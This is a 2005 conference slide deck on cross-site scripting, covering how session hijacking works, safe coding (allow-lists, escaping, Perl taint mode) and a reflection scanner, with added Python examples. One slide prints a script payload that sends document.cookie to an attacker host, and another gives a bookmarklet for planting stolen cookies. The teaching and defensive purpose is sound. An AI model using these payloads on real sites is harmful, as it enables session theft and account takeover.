Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site...
Cross Site Scripting Scanning
Sven Neuhaus
What The Hack 2005
V3 © 2005 Sven Neuhaus
Outline
● Introduction to Cross Site Scripting (XSS)
● Safe coding practices
● Scanning for vulnerabilities
Introduction to XSS
The Problem: User-supplied data gets inserted into dynamic web pages
Introduction to XSS
The Problem: User-supplied data gets inserted into dynamic web pages and executed as code by browsers!
Where does the data come from?
● Form input
● URLs (paths and parameters)
● HTTP_REFERER
● log files
● cookies
● DNS
● databases
Dangerous data
● Code in web pages:
  – JavaScript aka JScript, ECMAScript
  – VBScript
● Exploits for browser security holes:
  – Buffer overruns
  – Java sandbox holes
  – ActiveX components marked as “safe”
● Executed by the server:
  – PHP
The JavaScript security model
JavaScript code may
● access the current window and child windows and frames
● read and write cookies
● load data from URLs
Cookies
Cookies are used to store user sessions.
They have these attributes:
● domain
● path
● secure
● expiration date
● name/value
JavaScript can steal cookies!
Session hijacking step by step
1) create exploit URL or page
<script>new Image().src=
"http://evilsite/?data="+encodeURI(document.cookie)
</script>
Session hijacking step by step
1) create exploit URL or page
2) send it to the victim
3) victim visits URL
4) code gets inserted by server
5) victim’s browser executes code
6) code steals victim’s session cookie
7) attacker steals session
Live demonstration
Bookmarklet for cookie thieves
javascript:var cd=prompt('Cookie data?').replace(/\\/g,'').split(';');while(i=cd.shift())document.cookie=i;void alert("cookies:\n"+document.cookie);
XSS: Defacements & social engineering
Inserted code has complete control over the web page:
delete, create and alter texts, images and links.
Example: eBay auctions
User protection
Disable JavaScript in Mozilla for notorious sites:
In ~/.firefox/default/xyz.slt/user.js:
user_pref("capability.policy.policynames", "nojs");
user_pref("capability.policy.nojs.sites", "ebay.de ebay.com ebay.nl ebay.co.uk");
user_pref("capability.policy.nojs.javascript.enabled", "noAccess");
XSS example code
Vulnerable example Perl script from the CGI.pm documentation (shortened):
use CGI qw/:standard/;
print header, start_form,
    "What's your name?", textfield('name'), submit, end_form;
print "Your name is ", em(param('name')) if param();
Safe Coding Practices
XSS relies on insertion of control chars.
HTML: <, >, " and '
URLs: ?, & and =
SQL, Shell, PHP, SHTML have their own
Proper filtering
● Don't filter certain dangerous characters
● Instead, allow only characters deemed necessary!
● Sanitize data in one central location
● If control chars are allowed, escape them
Perl
Use perl's unique taint mode:
#!/usr/bin/perl -wT
/^([a-z0-9.-]*)$/ or die "\$_ is naughty!\n";
$_ = $1; # $_ is now untainted
Taint Mode with Perl modules
For DBI, use TaintIn:
$dbh = DBI->connect($dsn, $user, $pw, { TaintIn => 1 });
print() is considered safe, so taint mode will not stop tainted data from being printed into a page!
Use Apache::TaintRequest for fully automatic HTML entity escaping of tainted data:
<&> becomes &lt;&amp;&gt;
<"> becomes &lt;&quot;&gt;
PHP
XSS related functions:
string strip_tags ( string str [, string allowable_tags] )
string htmlentities ( string string [, int quote_style [, string charset]] )
string urlencode ( string str )
"=" becomes "%3D"
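The slides give the filtering rules (allow-list, one central place, escape what you must let through), the Perl taint regex, the entity mapping and the PHP escaping functions separately. The following is an added example, not the speaker's code and not the CGI.pm, Apache::TaintRequest or PHP implementations; it is written in Python (standard library only) rather than Perl because it runs as-is. The hostname allow-list is the one from the taint slide; the vulnerable/safe pair is the CGI.pm "What's your name?" page; `search_anchor` goes beyond the slides by showing that a user-supplied value placed in a link sits in two contexts at once and needs both escapers. Function names and the `/search?q=` URL are assumptions.

```python
"""Added example (not the speaker's code): allow-list validation plus
context-specific escaping, i.e. the 'Proper filtering' rules applied to
the CGI.pm name form. Standard library only."""
import html
import re
import urllib.parse

# Allow-list from the perl taint slide, /^([a-z0-9.-]*)$/, as a Python
# fullmatch. fullmatch also refuses a trailing newline, which '$' would
# accept with match() in both languages.
HOSTNAME_ALLOWLIST = re.compile(r'[a-z0-9.-]*')


def untaint_hostname(value: str) -> str:
    """Return value unchanged if every character is on the allow-list.

    Anything else is rejected outright; no attempt is made to strip '<'
    or '>' out of it. That is the 'allow only characters deemed
    necessary' rule rather than 'filter certain dangerous characters'."""
    if HOSTNAME_ALLOWLIST.fullmatch(value) is None:
        raise ValueError(f'{value!r} is naughty!')
    return value


def escape_html(text: str) -> str:
    """Escape the HTML control chars <, >, & and both quote characters.

    Same mapping an automatic escaper (Apache::TaintRequest, or PHP's
    htmlentities() with quotes enabled) applies before tainted data is
    printed into a page: '<&>' becomes '&lt;&amp;&gt;'."""
    return html.escape(text, quote=True)


def escape_url_param(text: str) -> str:
    """Escape the URL control chars ?, & and = (and every other unsafe
    byte) so the value can sit inside a query string: '=' becomes '%3D'."""
    return urllib.parse.quote(text, safe='')


def render_name_vulnerable(name: str) -> str:
    """The CGI.pm example: the parameter is printed straight into the
    page, so any markup inside it becomes part of the page."""
    return f'Your name is <em>{name}</em>'


def render_name_safe(name: str) -> str:
    """Same page, with escaping done in one central place just before output."""
    return f'Your name is <em>{escape_html(name)}</em>'


def search_anchor(query: str) -> str:
    """A link built from user data lives in two contexts: the value is
    URL-escaped for the query string, then the whole attribute is
    HTML-escaped because it sits inside an href (hypothetical /search URL)."""
    url = '/search?q=' + escape_url_param(query)
    return f'<a href="{escape_html(url)}">{escape_html(query)}</a>'
```

Note that `escape_html` does what the slides ask of an automatic escaper and nothing more: it makes the characters inert in HTML body and attribute context, but does not make a value safe inside a `<script>` block or a URL, which is why `search_anchor` applies the URL escaper first.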
Stopping Cookie Theft
● Store IP address in session - but beware of AOL proxy clusters!
● Limit cookie path
● Limit lifespan of session-id
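The three mitigations above, as an added example in Python (not code from the talk): an in-memory session store that binds a session to the client address it was issued to, expires the session id after a fixed lifespan, and emits a Set-Cookie header restricted to one path. The IP binding is switchable because of the proxy-cluster caveat on the slide. The `/app` path, the 900-second default and the `sid` cookie name are assumptions; the `HttpOnly` flag goes beyond the slide (it denies `document.cookie` reads, the channel the session hijacking slide relies on).

```python
"""Added example (not the speaker's code): the 'Stopping Cookie Theft'
measures as a small in-memory session store. Runs offline; client IPs
and the clock are supplied by the caller."""
import secrets
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Session:
    user: str
    ip: str            # address the session id was issued to
    expires_at: float  # absolute time after which the id is dead


class SessionStore:
    def __init__(self, lifespan_s: int = 900, bind_ip: bool = True):
        # bind_ip=False is the escape hatch for proxy clusters (the AOL
        # case on the slide), where one user's requests arrive from
        # changing addresses and IP binding would log them out.
        self.lifespan_s = lifespan_s
        self.bind_ip = bind_ip
        self._sessions: Dict[str, Session] = {}

    def create(self, user: str, ip: str, now: float) -> str:
        """Issue an unguessable session id with a limited lifespan."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = Session(user, ip, now + self.lifespan_s)
        return sid

    def lookup(self, sid: str, ip: str, now: float) -> Optional[str]:
        """Return the user for a valid session, or None when the id is
        unknown, expired, or presented from a different address."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now >= s.expires_at:            # limit lifespan of session-id
            del self._sessions[sid]
            return None
        if self.bind_ip and s.ip != ip:    # stored IP does not match
            return None
        return s.user

    def set_cookie_header(self, sid: str) -> str:
        """Set-Cookie value limiting path, lifetime and script access.
        Path=/app keeps the cookie off other paths on the same host;
        Max-Age matches the server-side lifespan; Secure and HttpOnly
        are the browser-side attributes (HttpOnly is not on the slide)."""
        return (f'sid={sid}; Path=/app; Max-Age={self.lifespan_s}; '
                'Secure; HttpOnly')
```

A stolen id therefore has to be replayed from the victim's address, within the lifespan, and only against `/app`; the server-side expiry check is what actually enforces the lifetime, since `Max-Age` is only advice to the browser.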
Cross Site Scripting Scanning
XSSS mode of operation
● Crawl website
● Detect forms and URLs with parameters
● Fill in forms, alter parameters to include control characters
● Scan web server response for our input
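The four steps above, as an added example of a reflection scanner in Python. This is not XSSS itself (which is the speaker's tool, available from the link at the end) but a minimal reimplementation of its mode of operation against a constructed fake site, so it runs offline: it parses one page for forms and parameterised links, submits a marker containing HTML control characters into each parameter, and reports whether the response echoes the marker raw, entity-escaped, or not at all. The `fetch` callback, the marker string and `FAKE_SITE` handlers are assumptions.

```python
"""Added example (not XSSS itself): the XSSS mode of operation as a
tiny reflection scanner. Pages are fetched through a caller-supplied
fetch(url, params) function, so the constructed fake site below stands
in for a real web server."""
import html
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse, parse_qsl

# Step 3: the control characters we insert; a safe page must escape them.
MARKER = 'xsss<">'


class FormAndLinkParser(HTMLParser):
    """Step 2: collect forms (with their input names) and links with parameters."""
    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []          # (action url, [field names])
        self.param_links = []    # (url without query, [parameter names])
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == 'form':
            self._current = (urljoin(self.base_url, a.get('action', '')), [])
            self.forms.append(self._current)
        elif tag == 'input' and self._current is not None and a.get('name'):
            self._current[1].append(a['name'])
        elif tag == 'a' and a.get('href'):
            url = urljoin(self.base_url, a['href'])
            query = urlparse(url).query
            if query:
                names = [k for k, _ in parse_qsl(query)]
                self.param_links.append((url.split('?', 1)[0], names))

    def handle_endtag(self, tag):
        if tag == 'form':
            self._current = None


def injection_points(page_html, base_url):
    p = FormAndLinkParser(base_url)
    p.feed(page_html)
    return p.forms + p.param_links


def classify(body):
    """Step 4: how the server handled MARKER in its response."""
    if MARKER in body:
        return 'raw'          # control chars survived: reflected XSS candidate
    if html.escape(MARKER, quote=True) in body:
        return 'escaped'      # reflected, but entity-escaped
    return 'absent'           # not reflected on this page


def scan(fetch, start_url):
    """Steps 1-4 for one page: returns (url, parameter, verdict) per probe."""
    results = []
    for url, names in injection_points(fetch(start_url, {}), start_url):
        for name in names:
            results.append((url, name, classify(fetch(url, {name: MARKER}))))
    return results


# Constructed fake site, not a real server: one vulnerable and one safe page.
def fake_fetch(url, params):
    path = urlparse(url).path
    if path == '/':
        return ('<form action="/hello"><input name="name"></form>'
                '<a href="/search?q=test">search</a>')
    if path == '/hello':      # vulnerable: echoes the parameter as-is
        return f"Your name is <em>{params.get('name', '')}</em>"
    if path == '/search':     # safe: entity-escapes before output
        return f"Results for {html.escape(params.get('q', ''))}"
    return ''


def demo():
    return scan(fake_fetch, 'http://example.test/')
```

Run against a site you are responsible for, the `raw` verdict is the one to act on: it means the control characters reached the page unescaped, which is exactly the insertion the safe coding slides are meant to prevent. A real crawler would follow every discovered link and also exercise POST forms; the fake site keeps it to a single page.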
XSSS Live demonstration
Q&A
XSS/XSSS Resources
XSSS download and XSS link list at: http://www.sven.de/xsss/
Contact address:
Sven Neuhaus <[email protected]>
© 2005 Sven Neuhaus